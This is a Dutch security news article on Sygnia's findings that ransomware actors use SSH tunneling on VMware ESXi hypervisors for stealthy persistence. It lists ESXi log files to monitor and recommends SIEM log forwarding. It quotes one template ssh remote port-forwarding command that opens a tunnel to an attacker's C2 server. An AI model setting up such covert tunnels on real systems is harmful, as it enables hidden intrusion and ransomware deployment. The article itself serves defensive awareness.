Cybercriminelen gebruiken SSH-tunnels voor toegang tot VMware ESXi

Cybercriminelen gebruiken SSH-tunnels voor toegang tot VMware ESXi

Ransomware-actoren die zich richten op ESXi bare-metal hypervisors maken gebruik van SSH-tunneling voor toegang tot het systeem zonder dat men hen detecteert. 

VMware ESXi-apparaten spelen een cruciale rol in virtuele omgevingen. Dit, omdat ze meerdere virtuele machines van een organisatie op een enkele fysieke server kunnen draaien.

Deze systemen worden vaak nauwelijks gemonitord, blijkt uit onderzoek van Sygnia. Ze zijn zo een doelwit voor hackers die toegang willen krijgen tot bedrijfsnetwerken. Hierdoor kunnen zij data stelen en bestanden versleutelen, waardoor ze een volledig bedrijf lamgeleggen door alle virtuele machines ontoegankelijk te maken.

Beveiligingslekken benutten

Cybersecuritybedrijf Sygnia meldt dat criminelen compromittering in veel gevallen bereiken door bekende kwetsbaarheden te misbruiken. Of door gebruik te maken van gecompromitteerde beheerdersreferenties. 

ESXi beschikt over een ingebouwde SSH-service waarmee beheerders de hypervisor op afstand via een shell kunnen beheren. Volgens Sygnia misbruiken ransomware-actoren deze functie om persistentie te bereiken, zich lateraal te bewegen en ransomware-payloads te implementeren. Aangezien veel organisaties SSH-activiteit op ESXi niet actief monitoren, kunnen aanvallers dit op een heimelijke manier gebruiken.

Opzetten van tunneling is eenvoudig

Zodra de hackers op het apparaat zitten, is het opzetten van de tunneling een eenvoudige taak met behulp van de native SSH-functionaliteit. Of door andere veelgebruikte tools met vergelijkbare mogelijkheden te implementeren, legt een woordvoerder van Sygnia uit.

Door bijvoorbeeld gebruik te maken van de SSH-binary, kan eenvoudig een remote port-forwarding naar de C2-server worden ingesteld met het volgende commando:  

`ssh –fN -R 127.0.0.1:<SOCKS-poort> <gebruiker>@<C2 IP-adres>`

Aangezien ESXi-apparaten veerkrachtig zijn en zelden onverwacht worden uitgeschakeld, fungeert deze tunneling als een semi-persistente achterdeur binnen het netwerk, blijkt uit de verklaring van Sygnia.

Gebreken in logging

Sygnia wijst ook op uitdagingen bij het monitoren van ESXi-logs, wat leidt tot aanzienlijke zichtbaarheidshiaten waar ransomware-actoren handig gebruik van maken.

In tegenstelling tot de meeste systemen, waar logs in een enkele syslog-bestand worden samengevoegd, verdeelt ESXi logs over meerdere specifieke logbestanden. Bewijsmateriaal vinden vereist dus het samenvoegen van informatie uit verschillende bronnen.

Het beveiligingsbedrijf beveelt systeembeheerders aan om de volgende vier logbestanden te controleren om SSH-tunneling en ransomware-activiteit te detecteren.

– `/var/log/shell.log` → Volgt commando-uitvoering in de ESXi Shell  
– `/var/log/hostd.log` → Logt administratieve activiteiten en gebruikersauthenticatie  
– `/var/log/auth.log` → Registreert inlogpogingen en authenticatie-evenementen  
– `/var/log/vobd.log` → Bevat systeem- en beveiligingsgebeurtenissen  

De bestanden `hostd.log` en `vobd.log` bevatten waarschijnlijk ook sporen van wijzigingen in firewallregels, wat essentieel is voor het handhaven van persistente SSH-toegang.

Het is belangrijk op te merken dat ransomware-actoren vaak logs wissen om bewijs van SSH-toegang te verwijderen, tijdstempels wijzigen of logs inkorten om onderzoekers te verwarren. Bewijs vinden is daarom niet altijd eenvoudig.

Aanbevelingen

Het wordt sterk aanbevolen dat organisaties ESXi-logs centraliseren via syslog-forwarding en deze integreren in een Security Information & Event Management (SIEM)-systeem om afwijkingen te detecteren.